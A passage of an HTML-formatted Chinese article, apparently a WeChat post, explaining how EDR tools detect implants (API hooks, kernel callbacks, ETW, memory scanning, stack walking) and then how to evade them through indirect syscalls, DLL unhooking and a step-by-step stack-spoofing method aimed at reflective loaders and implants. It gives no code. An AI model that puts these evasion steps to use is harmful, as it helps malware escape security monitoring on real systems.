style="font-family:Cambria;mso-ascii-font-family:Cambria;mso-fareast-font-family:Cambria;font-variant:normal;text-transform:none;">           <o:p> </o:p></span></span></p><p style="line-height: 1.5em;margin-bottom: 16px;"><span style="font-size: 24px;"><strong><span style="font-size: 24px;font-family: Calibri;font-variant: normal;text-transform: none;">EDR检测原理</span></strong></span></p><p style="line-height: 1.5em;margin-bottom: 16px;"><strong><span style="font-family: Calibri;font-variant: normal;text-transform: none;font-size: 20px;color: rgb(2, 30, 170);">EDR的标准实现方案</span></strong><span style="font-family: Calibri;font-variant: normal;text-transform: none;font-size: 20px;color: rgb(2, 30, 170);"></span></p><p><strong><span style="font-family: mp-quote, -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;font-size: var(--articleFontsize);letter-spacing: 0.034em;">R3：</span></strong><span style="font-family: mp-quote, -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;font-size: var(--articleFontsize);letter-spacing: 0.034em;">借助API HOOK拦截敏感函数调用，跟踪参数和返回值。</span></p><p><span style="font-family: mp-quote, -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;font-size: var(--articleFontsize);letter-spacing: 0.034em;">主要在行为检测中应用，在内存检测中是个可选项，通过HOOK不同API实现不同的监控偏好（如NtAllocateVirtualMemory）。</span><span style="font-family: mp-quote, -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;font-size: var(--articleFontsize);letter-spacing: 0.034em;"></span></p><p style="margin-top: 9pt;text-align: left;margin-left: 0pt;text-indent: 0pt;font-size: 12pt;font-family: Cambria;font-weight: normal;line-height: 1.5em;margin-bottom: 16px;"><strong><span style=""><span style="mso-bookmark:edr的标准实现方案;"><span style="font-family:Cambria;mso-ascii-font-family:Cambria;mso-fareast-font-family:Cambria;font-variant:normal;text-transform:none;">R0：</span></span></span></strong><span style="font-family: mp-quote, -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;font-size: var(--articleFontsize);letter-spacing: 0.034em;text-align: justify;"></span></p><ul class="list-paddingleft-1" style="list-style-type: circle;"><li><p>内核回调-Windows / 内核探针（Kprobes）-Linux</p></li><li><p>内核钩子 - SSDT系统调用表、全局描述符表GDT、中断描述符表（IDT）钩子会和x64下的patch guard冲突，但依然有绕过方式。</p></li><li><p>借助ETW实现对底层调用的监控 - ETW是Windows提供的一个强大的消息跟踪机制，允许收集包括内核事件在内的各种系统级事件。通过订阅特定的ETW提供者和事件，EDR可以获得关于系统行为的详细信息。</p></li><li><p>硬件辅助 - Intel VT-x或AMD-V，在更低的硬件级别提供对执行环境的控制和监视。</p></li></ul><p><br/></p><p style="line-height: 1.5em;margin-bottom: 16px;"><span style=""><span style="mso-bookmark:edr的标准实现方案;"><span style="font-family:Cambria;mso-ascii-font-family:Cambria;font-variant:normal;text-transform:none;">下图为依赖内核回调触发R3 API Hook的函数调用检测方案，也是最通用的。</span></span></span>    <o:page></o:page></p><p style="margin-top: 9pt;text-align: left;margin-left: 0pt;text-indent: 0pt;font-size: 12pt;font-family: Cambria;font-weight: normal;line-height: 1.5em;margin-bottom: 16px;"><span style=""><span style="mso-bookmark:edr的标准实现方案;"><span style="font-family:Cambria;mso-ascii-font-family:Cambria;mso-fareast-font-family:Cambria;font-variant:normal;text-transform:none;"><img class="rich_pages wxw-img" data-backh="213" data-backw="560" data-imgfileid="100000503" data-ratio="0.38055555555555554" style="width: 100%;height: auto !important;" data-type="png" data-w="1080" src="https://wechat2rss.xlab.app/img-proxy/?k=65c0af13&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fsz_mmbiz_png%2FgS0DP6tuCtI5HicgrSfwj6kTH64hjLXkFsnoicT2KDdsHSjicL35Xmiak0jic1kuUAz319YmG6UpodmsibBJ9cue1iaqQ%2F640%3Fwx_fmt%3Dpng"/></span></span></span></p><hr style="border-style: solid;border-width: 1px 0 0;border-color: rgba(0,0,0,0.1);-webkit-transform-origin: 0 0;-webkit-transform: scale(1, 0.5);transform-origin: 0 0;transform: scale(1, 0.5);"/><p style="line-height: 1.5em;margin-bottom: 16px;"><strong><span style="font-family: 宋体;font-variant: normal;text-transform: none;font-size: 20px;color: rgb(2, 30, 170);"></span></strong></p><p style="line-height: 1.5em;margin-bottom: 16px;"><strong><span style="font-family: 宋体;font-variant: normal;text-transform: none;font-size: 20px;color: rgb(2, 30, 170);">内存扫描关键技术</span></strong></p><p style="line-height: 1.5em;margin-bottom: 16px;"><span style="mso-bookmark:内存扫描关键技术;"></span><strong><span style=""><span style=""><span style="font-family:宋体;mso-ascii-font-family:Calibri;font-variant:normal;text-transform:none;">策略① - 偏向精准检测</span></span></span></strong><span style="font-family: mp-quote, -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;font-size: var(--articleFontsize);letter-spacing: 0.034em;"></span></p><ul class="list-paddingleft-1" style="list-style-type: circle;"><li><p>R3 Hook，初筛敏感API调用；</p></li><li><p>利用ETW/硬件虚拟化/内核钩子等技术检测底层调用；</p></li><li><p>触发规则立即启动栈回溯；</p></li><li><p>重点扫描栈回溯过程中发现的可疑地址对应的内存。</p></li></ul><p><br/></p><p style="line-height: 1.5em;margin-bottom: 16px;"><span style=""><span style=""><span style="font-family:Cambria;mso-ascii-font-family:Cambria;font-variant:normal;text-transform:none;">精准检测策略主打快准狠，第一时间阻止植入体的释放或运行。但为考虑到误报和性能开销等实际问题，相对固定的规则可能会导致漏报。</span></span></span></p><p style="line-height: 1.5em;margin-bottom: 16px;"><span style=""></span><strong><span style=""><span style=""><span style="font-family:宋体;mso-ascii-font-family:Calibri;font-variant:normal;text-transform:none;">策略② - 偏向持续检测</span></span></span></strong><span style="font-family: mp-quote, -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;font-size: var(--articleFontsize);letter-spacing: 0.034em;"></span></p><ul class="list-paddingleft-1" style="list-style-type: circle;"><li><p>监控线程状态（包含线程的堆栈、运行状态等）；</p></li><li><p>对私有内存页进行扫描（通常在线程休眠时）；</p></li><li><p>搜索高熵区域、RWX等区域，重点标记；</p></li><li><p>对重点标记区提升扫描频率或重点监控该区域的读写、访问行为（可利用API Hook或底层调用的检测），直到探测到植入体相关特征。</p></li></ul><p><br/></p><p style="line-height: 1.5em;margin-bottom: 16px;"><span style=""><span style=""><span style="font-family:Cambria;mso-ascii-font-family:Cambria;font-variant:normal;text-transform:none;">主要为避免漏报。但同时为了降低误报，其规则可能不再是固定的模板而是个权重（或结合本地/云端AI模型来综合判定）。因此响应有一定延迟，这也就是为什么有些EDR的内存扫描开启后会允许木马正常运行一段时间再杀的原因。</span></span></span></p><p style="line-height: 1.5em;margin-bottom: 16px;"><span style=""><span style=""><span style="font-family:Cambria;mso-ascii-font-family:Cambria;font-variant:normal;text-transform:none;"><br/></span></span></span></p><p style="line-height: 1.5em;margin-bottom: 16px;"><span style=""></span><strong><span style=""><span style="mso-bookmark:X390cff9b8153eb49804b199867cdceaaf7a6c43;"><span style="font-family:Calibri;mso-ascii-font-family:Calibri;mso-fareast-font-family:宋体;font-variant:normal;text-transform:none;">32/64位程序的栈回溯</span></span></span></strong><span style=""><span style="mso-bookmark:X390cff9b8153eb49804b199867cdceaaf7a6c43;"><span style="font-family:Calibri;mso-ascii-font-family:Calibri;mso-fareast-font-family:宋体;font-variant:normal;text-transform:none;"></span></span></span></p><ul class="list-paddingleft-1" style="list-style-type: circle;"><li><p>32位程序由于完全依赖栈实现参数传递，因此标准的栈结构是保存EBP作为基指针来访问局部变量和参数。栈回溯依赖于链式栈帧，通过保存在栈上的EBP寄存器链接，通过遍历这些链式栈帧精准可以找到每个调用的返回地址和调用者的栈帧。    <o:page></o:page></p></li></ul><p style="line-height: 1.5em;margin-bottom: 16px;"><span style=""><span style="mso-bookmark:X390cff9b8153eb49804b199867cdceaaf7a6c43;"><span style="font-family:Cambria;mso-ascii-font-family:Cambria;mso-fareast-font-family:Cambria;font-variant:normal;text-transform:none;"><img class="rich_pages wxw-img" data-backh="891" data-backw="487" data-imgfileid="100000506" data-ratio="1.83013698630137" style="width: 100%;height: auto !important;" data-type="png" data-w="365" src="https://wechat2rss.xlab.app/img-proxy/?k=c3fa184b&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fsz_mmbiz_png%2FgS0DP6tuCtI5HicgrSfwj6kTH64hjLXkFfiasjjryoW1ZkScZzCnpM0PNeOTWHrh9ibzJTXuicEwkOHtWHCMjVHGxQ%2F640%3Fwx_fmt%3Dpng"/></span></span></span>    <o:page></o:page></p><p style="margin-top: 9pt;text-align: left;margin-left: 0pt;text-indent: 0pt;font-size: 12pt;font-family: Cambria;font-weight: normal;line-height: 1.5em;margin-bottom: 16px;"><span style=""><span style="mso-bookmark:X390cff9b8153eb49804b199867cdceaaf7a6c43;"><span style="font-family:Cambria;mso-ascii-font-family:Cambria;mso-fareast-font-family:Cambria;font-variant:normal;text-transform:none;"><img class="rich_pages wxw-img" data-imgfileid="100000508" data-ratio="0.3498233215547703" style="width: 377.339996px;height: auto !important;" data-type="png" data-w="283" src="https://wechat2rss.xlab.app/img-proxy/?k=7f2b4d2e&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fsz_mmbiz_png%2FgS0DP6tuCtI5HicgrSfwj6kTH64hjLXkFEMYl44KWAtrBiaxUvv1sfRQpO4jqKax76ru2Pvq72NPGyDoSSbFfjNQ%2F640%3Fwx_fmt%3Dpng"/></span></span></span></p><ul class="list-paddingleft-1" style="list-style-type: circle;"><li><p>64位下由于主要使用寄存器传参，对栈的依赖减小，并且调用约定做了优化，只使用当前RSP的偏移来访问局部变量和参数，不再保存RBP。这种优化称为“省略帧指针”（FPO），但这也给栈回溯提升了难度，通常情况下为了降低算法复杂度，栈回溯需要借助.pdata节中的RUNTIME_FUNCTION结构（动态插桩或编译器插桩等精准回溯的方式对EDR来说不现实），不过这也给攻击者带来了便利。    <o:page></o:page></p></li></ul><p style="line-height: 1.5em;margin-bottom: 16px;"><span style=""><span style="mso-bookmark:X390cff9b8153eb49804b199867cdceaaf7a6c43;"><span style="font-family:Cambria;mso-ascii-font-family:Cambria;mso-fareast-font-family:Cambria;font-variant:normal;text-transform:none;"><img class="rich_pages wxw-img" data-backh="883" data-backw="557" data-imgfileid="100000507" data-ratio="1.5837320574162679" style="width: 100%;height: auto !important;" data-type="png" data-w="418" src="https://wechat2rss.xlab.app/img-proxy/?k=53f4da8f&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fsz_mmbiz_png%2FgS0DP6tuCtI5HicgrSfwj6kTH64hjLXkFQsVkGgnSbFC1vmeKyCOFOlXISnMgDA0txxP3tRibr4kU6rIibH1eOsqw%2F640%3Fwx_fmt%3Dpng"/></span></span></span>    <o:page></o:page></p><p style="margin-top: 9pt;text-align: left;margin-left: 0pt;text-indent: 0pt;font-size: 12pt;font-family: Cambria;font-weight: normal;line-height: 1.5em;margin-bottom: 16px;"><span style=""><span style="mso-bookmark:X390cff9b8153eb49804b199867cdceaaf7a6c43;"><span style="font-family:Cambria;mso-ascii-font-family:Cambria;mso-fareast-font-family:Cambria;font-variant:normal;text-transform:none;"><img class="rich_pages wxw-img" data-backh="136" data-backw="399" data-imgfileid="100000505" data-ratio="0.3411371237458194" style="width: 100%;height: auto !important;" data-type="png" data-w="299" src="https://wechat2rss.xlab.app/img-proxy/?k=a30b1a0a&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fsz_mmbiz_png%2FgS0DP6tuCtI5HicgrSfwj6kTH64hjLXkFZpf0ppwVia4bfNJSscbgagaPAvRJtYM0ibCibq7LrLqfc9ATax2ZjBa2w%2F640%3Fwx_fmt%3Dpng"/></span></span></span></p><p style="line-height: 1.5em;margin-bottom: 16px;"><span style="font-size: 20px;color: rgb(2, 30, 170);"><strong><span style="color: rgb(2, 30, 170);font-size: 20px;font-family: 宋体;font-variant: normal;text-transform: none;"><br/></span></strong></span></p><p style="line-height: 1.5em;margin-bottom: 16px;"><span style="font-size: 20px;color: rgb(2, 30, 170);"><strong><span style="color: rgb(2, 30, 170);font-size: 20px;font-family: 宋体;font-variant: normal;text-transform: none;">一个64位栈回溯的案例</span></strong></span></p><p style="line-height: 1.5em;margin-bottom: 16px;"><span style=""><span style="mso-bookmark:一个64位栈回溯的案例;"><span style="font-family:Cambria;mso-ascii-font-family:Cambria;mso-fareast-font-family:Cambria;font-variant:normal;text-transform:none;"><img class="rich_pages wxw-img" data-backh="256" data-backw="560" data-imgfileid="100000509" data-ratio="0.45740740740740743" style="width: 100%;height: auto !important;" data-type="png" data-w="1080" src="https://wechat2rss.xlab.app/img-proxy/?k=9241de01&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fsz_mmbiz_png%2FgS0DP6tuCtI5HicgrSfwj6kTH64hjLXkFVTFfeAMJCMiabDdXMYo2JBcpEw2dxIJfexwUofKL76lHYQHKiaxS7xXw%2F640%3Fwx_fmt%3Dpng"/></span></span></span></p><hr style="border-style: solid;border-width: 1px 0 0;border-color: rgba(0,0,0,0.1);-webkit-transform-origin: 0 0;-webkit-transform: scale(1, 0.5);transform-origin: 0 0;transform: scale(1, 0.5);"/><p style="line-height: 1.5em;margin-bottom: 16px;"><span style=""><span style="mso-bookmark:一个64位栈回溯的案例;"><span style="font-family:Cambria;mso-ascii-font-family:Cambria;mso-fareast-font-family:Cambria;font-variant:normal;text-transform:none;"></span></span></span></p><p style="line-height: 1.5em;margin-bottom: 16px;"><span style="font-size: 24px;"><strong><span style="font-size: 24px;font-family: 宋体;font-variant: normal;text-transform: none;">对抗方案-精准检测</span></strong></span></p><p style="line-height: 1.5em;margin-bottom: 16px;"><span style="color: rgb(2, 30, 170);"><strong><span style="color: rgb(2, 30, 170);font-family: Calibri;font-variant: normal;text-transform: none;font-size: 20px;">SYSCALL</span></strong></span></p><p style="line-height: 1.5em;margin-bottom: 16px;"><span style=""><span style="mso-bookmark:syscall;"><span style="font-family:Cambria;mso-ascii-font-family:Cambria;font-variant:normal;text-transform:none;">可参考开源项目：</span></span></span><span style=""><span style="mso-bookmark:syscall;"><span style="font-size:12.0pt;font-family:Cambria;mso-ascii-font-family:Cambria;mso-fareast-font-family:Cambria;font-variant:normal;text-transform:none;text-underline:none;text-decoration:none;">GitHub - Dec0ne/HWSyscalls: HWSyscalls is a new method to execute indirect syscalls using HWBP, HalosGate and a synthetic trampoline on kernel32 with HWBP.</span></span></span><span style=""><span style="mso-bookmark:syscall;"><span style="font-family:Cambria;mso-ascii-font-family:Cambria;mso-fareast-font-family:Cambria;font-variant:normal;text-transform:none;"></span></span></span></p><p style="margin-top: 9pt;text-align: left;margin-left: 0pt;text-indent: 0pt;font-size: 12pt;font-family: Cambria;font-weight: normal;line-height: 1.5em;margin-bottom: 16px;"><span style=""><span style="mso-bookmark:syscall;"><span style="font-family:Cambria;mso-ascii-font-family:Cambria;mso-fareast-font-family:Cambria;font-variant:normal;text-transform:none;"><img class="rich_pages wxw-img" data-backh="160" data-backw="560" data-imgfileid="100000510" data-ratio="0.28524046434494194" style="width: 100%;height: auto !important;" data-type="png" data-w="603" src="https://wechat2rss.xlab.app/img-proxy/?k=0355433b&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fsz_mmbiz_png%2FgS0DP6tuCtI5HicgrSfwj6kTH64hjLXkFgTsQ08QxR3WYn2giac5alDPic8ARgOJY1qgaoh067YuJghKNGWGdJDlA%2F640%3Fwx_fmt%3Dpng"/></span></span></span>    <o:page></o:page></p><p style="margin-top: 9pt;text-align: left;margin-left: 0pt;text-indent: 0pt;font-size: 12pt;font-family: Cambria;font-weight: normal;line-height: 1.5em;margin-bottom: 16px;"><span style=""><span style="mso-bookmark:syscall;"><span style="font-family:Cambria;mso-ascii-font-family:Cambria;mso-fareast-font-family:Cambria;font-variant:normal;text-transform:none;"><img class="rich_pages wxw-img" data-backh="123" data-backw="560" data-imgfileid="100000512" data-ratio="0.22023047375160051" style="width: 100%;height: auto !important;" data-type="png" data-w="781" src="https://wechat2rss.xlab.app/img-proxy/?k=d8abb67f&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fsz_mmbiz_png%2FgS0DP6tuCtI5HicgrSfwj6kTH64hjLXkFoSMdKpPWaz7icglxowujUcj5ibWdW07uZpO4Epo8vJdJBibdyldwet4uQ%2F640%3Fwx_fmt%3Dpng"/></span></span></span></p><p style="line-height: 1.5em;margin-bottom: 16px;"><span style="font-size: 20px;color: rgb(2, 30, 170);"><strong><span style="color: rgb(2, 30, 170);font-size: 20px;font-family: Calibri;font-variant: normal;text-transform: none;">Unhook</span></strong></span><span style="font-family: mp-quote, -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;font-size: var(--articleFontsize);letter-spacing: 0.034em;"></span></p><ul class="list-paddingleft-1" style="list-style-type: circle;"><li><p>方法1：将磁盘上“干净”的dll映射到当前进程中，读取.text节并覆盖被hook的dll的.text节。</p></li><li><p>方法2：创建一个白名单进程，读取其未被hook的dll，覆盖当前进程中dll的.text节。</p></li><li><p>方法3：没有白名单程序的情况下，在新进程启动加载完成dll时将其挂起，保留其中“干净”的dll快照，覆盖当前进程dll的.text节。</p></li><li><p>......</p><p><br/></p></li></ul><p style="line-height: 1.5em;margin-bottom: 16px;"><span style=""><span style="mso-bookmark:unhook;"><span style="font-family:Cambria;mso-ascii-font-family:Cambria;font-variant:normal;text-transform:none;">总结一句话：用一个“干净”的副本覆盖掉被Hook部分的代码。</span></span></span></p><p style="margin-top: 9pt;text-align: left;margin-left: 0pt;text-indent: 0pt;font-size: 12pt;font-family: Cambria;font-weight: normal;line-height: 1.5em;margin-bottom: 16px;"><span style=""><span style="mso-bookmark:unhook;"><span style="font-family:Cambria;mso-ascii-font-family:Cambria;mso-fareast-font-family:Cambria;font-variant:normal;text-transform:none;"><img class="rich_pages wxw-img" data-backh="237" data-backw="560" data-imgfileid="100000513" data-ratio="0.4225352112676056" style="width: 100%;height: auto !important;" data-type="png" data-w="710" src="https://wechat2rss.xlab.app/img-proxy/?k=4dba63f8&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fsz_mmbiz_png%2FgS0DP6tuCtI5HicgrSfwj6kTH64hjLXkFNsLrRgpa2bfMMwvqaSA1EQJ4e3pWo6owk4orE74Wia8H3QpsP1N34Qw%2F640%3Fwx_fmt%3Dpng"/></span></span></span></p><p style="margin-top: 9pt;text-align: left;margin-left: 0pt;text-indent: 0pt;font-size: 12pt;font-family: Cambria;font-weight: normal;line-height: 1.5em;margin-bottom: 16px;"><span style=""><span style="mso-bookmark:unhook;"><span style="font-family:Cambria;mso-ascii-font-family:Cambria;mso-fareast-font-family:Cambria;font-variant:normal;text-transform:none;">Unhook效果如下：</span></span></span></p><p style="margin-top: 9pt;text-align: left;margin-left: 0pt;text-indent: 0pt;font-size: 12pt;font-family: Cambria;font-weight: normal;line-height: 1.5em;margin-bottom: 16px;"><span style=""><span style="mso-bookmark:unhook;"><span style="font-family:Cambria;mso-ascii-font-family:Cambria;mso-fareast-font-family:Cambria;font-variant:normal;text-transform:none;"><img class="rich_pages wxw-img" data-backh="150" data-backw="560" data-imgfileid="100000514" data-ratio="0.26851851851851855" style="width: 100%;height: auto !important;" data-type="png" data-w="1080" src="https://wechat2rss.xlab.app/img-proxy/?k=3f328edf&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fsz_mmbiz_png%2FgS0DP6tuCtI5HicgrSfwj6kTH64hjLXkFViagmyCT9KsXm3hiaXPvicFfynbMYGEaJNiakEicrwfqAWPicW7Ge1gDqprA%2F640%3Fwx_fmt%3Dpng"/></span></span></span>    <o:page></o:page></p><p style="line-height: 1.5em;margin-bottom: 16px;"><span style="color: rgb(2, 30, 170);font-size: 20px;"><strong><span style="font-size: 20px;color: rgb(2, 30, 170);font-family: 宋体;font-variant: normal;text-transform: none;">栈回溯欺骗</span></strong></span></p><p style="line-height: 1.5em;margin-bottom: 16px;"><span style=""><span style="mso-bookmark:栈回溯欺骗;"><span style="font-family:Cambria;mso-ascii-font-family:Cambria;font-variant:normal;text-transform:none;">注意：由于栈帧伪造是对应局部函数调用的，因此在</span></span></span><span style=""><span style="mso-bookmark:栈回溯欺骗;"><span style="font-family:Cambria;mso-ascii-font-family:Cambria;font-variant:normal;text-transform:none;font-weight:bold;mso-bidi-font-weight:bold;font-style:italic;mso-bidi-font-style:italic;">反射加载器</span></span></span><span style=""><span style="mso-bookmark:栈回溯欺骗;"><span style="font-family:Cambria;mso-ascii-font-family:Cambria;font-variant:normal;text-transform:none;">与</span></span></span><span style=""><span style="mso-bookmark:栈回溯欺骗;"><span style="font-family:Cambria;mso-ascii-font-family:Cambria;font-variant:normal;text-transform:none;font-weight:bold;mso-bidi-font-weight:bold;font-style:italic;mso-bidi-font-style:italic;">核心植入体</span></span></span><span style=""><span style="mso-bookmark:栈回溯欺骗;"><span style="font-family:Cambria;mso-ascii-font-family:Cambria;font-variant:normal;text-transform:none;">代码中实现才能达到效果最大化，因为绝大多数敏感函数的调用都在这两层的代码中；仅在“外壳”Loader中实现效果并不好。</span></span></span><span style="font-family: mp-quote, -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;font-size: var(--articleFontsize);letter-spacing: 0.034em;"></span></p><ol class="list-paddingleft-1" style="list-style-type: decimal;"><li><p>重写系统API替换高风险函数，如NtAllocateVirtualMemory()等；</p></li><li><p>在重写的函数中，先保存现场存储当前线程上下文到一个全局结构体中，然后抬高栈顶，并PUSH 0，将真实的栈帧截断并隐藏起来；</p></li><li><p>在这之上部署一个假栈（伪造一些常见的返回地址制作一个栈底和看上去合理的调用链）；</p></li><li><p>在假栈上方部署一个Gadget Frame用来做跳转（跳转回高风险函数调用前的位置，比如预先从内存中找好的JMP [RBX]片段）；</p></li><li><p>为跳转和堆栈恢复做准备，将真正的返回地址、RBX寄存器值放入结构体暂存，然后将堆栈恢复函数fixup()的地址给RBX，最后JMP到真正的函数调用；</p></li><li><p>真正的函数调用完毕后会将部署的Gadget当作返回地址跳转至JMP [RBX]执行，而此时时RBX保存的是自定义方法中fixup()的地址，进入堆栈恢复函数，恢复帧栈和前面保存的寄存器，最后JMP回到原来高风险函数调用的位置。</p><p><br/></p></li></ol><p style="line-height: 1.5em;margin-bottom: 16px;"><strong><span style=""><span style="mso-bookmark:栈回溯欺骗;"><span style="font-family:Cambria;mso-ascii-font-family:Cambria;font-variant:normal;text-transform:none;">概括：</span></span></span></strong><span style=""><span style="mso-bookmark:栈回溯欺骗;"><span style="font-family:Cambria;mso-ascii-font-family:Cambria;font-variant:normal;text-transform:none;">使用汇编重写敏感函数调用，在我们自己编写的调用约定中对栈进行布局，将原始栈帧隐藏在构造的假栈下面，干扰栈回溯算法的判断。在函数执行完成返回的时候再借助之前构造的gadget精准返回到原本的返回地址。</span></span></span>    <o:page></o:page></p><p style="margin-top: 9pt;text-align: left;margin-left: 0pt;text-indent: 0pt;font-size: 12pt;font-family: Cambria;font-weight: normal;line-height: 1.5em;margin-bottom: 16px;"><span style=""><span style="mso-bookmark:栈回溯欺骗;"><span style="font-family:Cambria;mso-ascii-font-family:Cambria;mso-fareast-font-family:Cambria;font-variant:normal;text-transform:none;"><img class="rich_pages wxw-img" data-backh="408" data-backw="560" data-imgfileid="100000511" data-ratio="0.7282127031019202" style="width: 100%;height: auto !important;" data-type="png" data-w="677" src="https://wechat2rss.xlab.app/img-proxy/?k=d18fd023&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fsz_mmbiz_png%2FgS0DP6tuCtI5HicgrSfwj6kTH64hjLXkF0gaekjrxRpwGqgVb982w2XxgibTviaV9bjkzxxW3oQUEUUjh6Xia50CmQ%2F640%3Fwx_fmt%3Dpng"/></span></span></span></p><p style="margin-top: 9pt;text-align: left;margin-left: 0pt;text-indent: 0pt;font-size: 12pt;font-family: Cambria;font-weight: normal;line-height: 1.5em;margin-bottom: 16px;"><span style=""><span style="mso-bookmark:栈回溯欺骗;"><span style="font-family:Cambria;mso-ascii-font-family:Cambria;font-variant:normal;text-transform:none;">直接调用与栈帧伪造的对比如下。</span></span></span></p><p style="margin-top: 9pt;text-align: left;margin-left: 0pt;text-indent: 0pt;font-size: 12pt;font-family: Cambria;font-weight: normal;line-height: 1.5em;margin-bottom: 16px;"><span style=""><span style="mso-bookmark:栈回溯欺骗;"><span style="font-family:Cambria;mso-ascii-font-family:Cambria;font-variant:normal;text-transform:none;">直接调用：</span></span></span></p><p style="margin-top: 9pt;text-align: left;margin-left: 0pt;text-indent: 0pt;font-size: 12pt;font-family: Cambria;font-weight: normal;line-height: 1.5em;margin-bottom: 16px;"><span style=""><span style="mso-bookmark:栈回溯欺骗;"><span style="font-family:Cambria;mso-ascii-font-family:Cambria;mso-fareast-font-family:Cambria;font-variant:normal;text-transform:none;"><img class="rich_pages wxw-img" data-backh="280" data-backw="560" data-imgfileid="100000519" data-ratio="0.5" style="width: 100%;height: auto !important;" data-type="png" data-w="1080" src="https://wechat2rss.xlab.app/img-proxy/?k=42fdf395&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fsz_mmbiz_png%2FgS0DP6tuCtI5HicgrSfwj6kTH64hjLXkFv6BNE8rgw4BAhk1U7cKIliajHYicwxBWeSfyYare1qytNfGNn7oIyBDg%2F640%3Fwx_fmt%3Dpng"/></span></span></span></p><p style="margin-top: 9pt;text-align: left;margin-left: 0pt;text-indent: 0pt;font-size: 12pt;font-family: Cambria;font-weight: normal;line-height: 1.5em;margin-bottom: 16px;"><span style=""><span style="mso-bookmark:栈回溯欺骗;"><span style="font-family:Cambria;mso-ascii-font-family:Cambria;font-variant:normal;text-transform:none;">栈帧伪造：</span></span></span>    <o:page></o:page></p><p style="margin-top: 9pt;text-align: left;margin-left: 0pt;text-indent: 0pt;font-size: 12pt;font-family: Cambria;font-weight: normal;line-height: 1.5em;margin-bottom: 16px;"><span style=""><span style="mso-bookmark:栈回溯欺骗;"><span style="font-family:Cambria;mso-ascii-font-family:Cambria;mso-fareast-font-family:Cambria;font-variant:normal;text-transform:none;"><img class="rich_pages wxw-img" data-backh="264" data-backw="560" data-imgfileid="100000518" data-ratio="0.4722222222222222" style="width: 100%;height: auto !important;" data-type="png" data-w="1080" src="https://wechat2rss.xlab.app/img-proxy/?k=a73f6291&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fsz_mmbiz_png%2FgS0DP6tuCtI5HicgrSfwj6kTH64hjLXkFOYqWSNmTStB0ufvpiaDIg078SlqJd0fs8b0QGicQyKokeKnk9e7IpZIw%2F640%3Fwx_fmt%3Dpng"/></span></span></span></p><p style="margin-top: 9pt;text-align: left;margin-left: 0pt;text-indent: 0pt;font-size: 12pt;font-family: Cambria;font-weight: normal;line-height: 1.5em;margin-bottom: 16px;"><span style=""><span style="mso-bookmark:栈回溯欺骗;"><span style="font-family:Cambria;mso-ascii-font-family:Cambria;mso-fareast-font-family:Cambria;font-variant:normal;text-transform:none;"><img class="rich_pages wxw-img" data-backh="423" data-backw="560" data-imgfileid="100000516" data-ratio="0.7547169811320755" style="width: 100%;height: auto !important;" data-type="png" data-w="795" src="https://wechat2rss.xlab.app/img-proxy/?k=f94aae49&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fsz_mmbiz_png%2FgS0DP6tuCtI5HicgrSfwj6kTH64hjLXkFgfZicib0JSibUcxWmzVrykmZDudibooibeBoibr8Ae8NAiamqPliavs08wjVgA%2F640%3Fwx_fmt%3Dpng"/></span></span></span></p><p style="margin-top: 9pt;text-align: left;margin-left: 0pt;text-indent: 0pt;font-size: 12pt;font-family: Cambria;font-weight: normal;line-height: 1.5em;margin-bottom: 16px;"><span style=""><span style="mso-bookmark:栈回溯欺骗;"><span style="font-family:Cambria;mso-ascii-font-family:Cambria;mso-fareast-font-family:Cambria;font-variant:normal;text-transform:none;">       </span></span></span></p><hr style="border-style: solid;border-width: 1px 0 0;border-color: rgba(0,0,0,0.1);-webkit-transform-origin: 0 0;-webkit-transform: scale(1, 0.5);transform-origin: 0 0;transform: scale(1, 0.5);"/><p style="margin-top: 9pt;text-align: left;margin-left: 0pt;text-indent: 0pt;font-size: 12pt;font-family: Cambria;font-weight: normal;line-height: 1.5em;margin-bottom: 16px;"><span style=""><span 